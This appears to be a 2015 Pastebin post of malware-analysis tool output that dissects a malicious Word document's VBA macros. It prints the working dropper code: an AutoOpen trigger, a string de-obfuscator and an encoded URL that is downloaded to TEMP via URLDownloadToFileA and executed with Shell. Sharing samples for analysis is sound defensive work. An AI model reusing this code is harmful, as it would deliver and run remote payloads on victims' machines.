SHARE
TWEET

Malicious Word macro

dynamoo Mar 4th, 2015 335 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- document1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: document1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: document1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. yQtUv56E4r
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: document1.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. #If VBA7 Then
  29.     Private Declare PtrSafe Function sdfsdfsdfsdf Lib "urlmon" Alias _
  30.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  31.     ByVal gfhgfhF As String, _
  32.     ByVal hjkhgFF As String, _
  33.     ByVal gfhfghF As Long, _
  34.     ByVal gfdgdf As LongPtr) As LongPtr
  35. #Else
  36.     Private Declare Function sdfsdfsdfsdf Lib "urlmon" Alias _
  37.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  38.     ByVal gfhgfhF As String, _
  39.     ByVal hjkhgFF As String, _
  40.     ByVal gfhfghF As Long, _
  41.     ByVal gfdgdf As Long) As Long
  42. #End If
  43. Function ukQ2q73(o9Z_ As String, lb2tLi3yX9 As String) As Boolean
  44. vJHKBJdfkgfg = sdfsdfsdfsdf(0&, o9Z_, lb2tLi3yX9, 0&, 0&)
  45. Dim G32Q
  46. G32Q = Shell(lb2tLi3yX9, 1)
  47. End Function
  48.  
  49.  
  50.  
  51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  52. ANALYSIS:
  53. +------------+--------------------+-----------------------------------------+
  54. | Type       | Keyword            | Description                             |
  55. +------------+--------------------+-----------------------------------------+
  56. | Suspicious | Lib                | May run code from a DLL                 |
  57. | Suspicious | Shell              | May run an executable file or a system  |
  58. |            |                    | command                                 |
  59. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  60. +------------+--------------------+-----------------------------------------+
  61. -------------------------------------------------------------------------------
  62. VBA MACRO Class1.cls
  63. in file: document1.doc - OLE stream: u'Macros/VBA/Class1'
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. (empty macro)
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: document1.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  71. Public Function wNLiDcUQctHeQbyt(TRQIOVnNMdSVNmP As String) As String
  72. GoTo GiChFYjYUOh
  73. GiChFYjYUOh:
  74. GoTo lvBxJabwyHfMp
  75. lvBxJabwyHfMp:
  76. For saOjZPeoQQJJ = 1 To Len(TRQIOVnNMdSVNmP) Step 2
  77. GoTo LTIokkjoZR
  78. LTIokkjoZR:
  79. GoTo ePgjmeCgKuqfzq
  80. ePgjmeCgKuqfzq:
  81. wNLiDcUQctHeQbyt = wNLiDcUQctHeQbyt & Mid(TRQIOVnNMdSVNmP, saOjZPeoQQJJ, 1)
  82. GoTo nnaMoKQlSkVaAo
  83. nnaMoKQlSkVaAo:
  84. GoTo xuRnLR
  85. xuRnLR:
  86. GoTo drMOY
  87. drMOY:
  88. Next
  89. GoTo VoIcVLrAAzEpipT
  90. VoIcVLrAAzEpipT:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Module3.bas
  98. in file: document1.doc - OLE stream: u'Macros/VBA/Module3'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. Sub yQtUv56E4r()
  101. ukQ2q73 wNLiDcUQctHeQbyt("h„tTtep}:O/u/Mr{e:tkr:oP-DmgoGtsoS.hcsbla‚.?p[lj/mjsI/?bwi{nU.be†x2e‚"), Environ(wNLiDcUQctHeQbyt("T8M}P-")) & wNLiDcUQctHeQbyt("\9G1HHjhk…d/j2fDgrjhk=G@KJ'.Le\xGe„")
  102. End Sub
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104. ANALYSIS:
  105. +------------+---------+---------------------------------------+
  106. | Type       | Keyword | Description                           |
  107. +------------+---------+---------------------------------------+
  108. | Suspicious | Environ | May read system environment variables |
  109. +------------+---------+---------------------------------------+
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top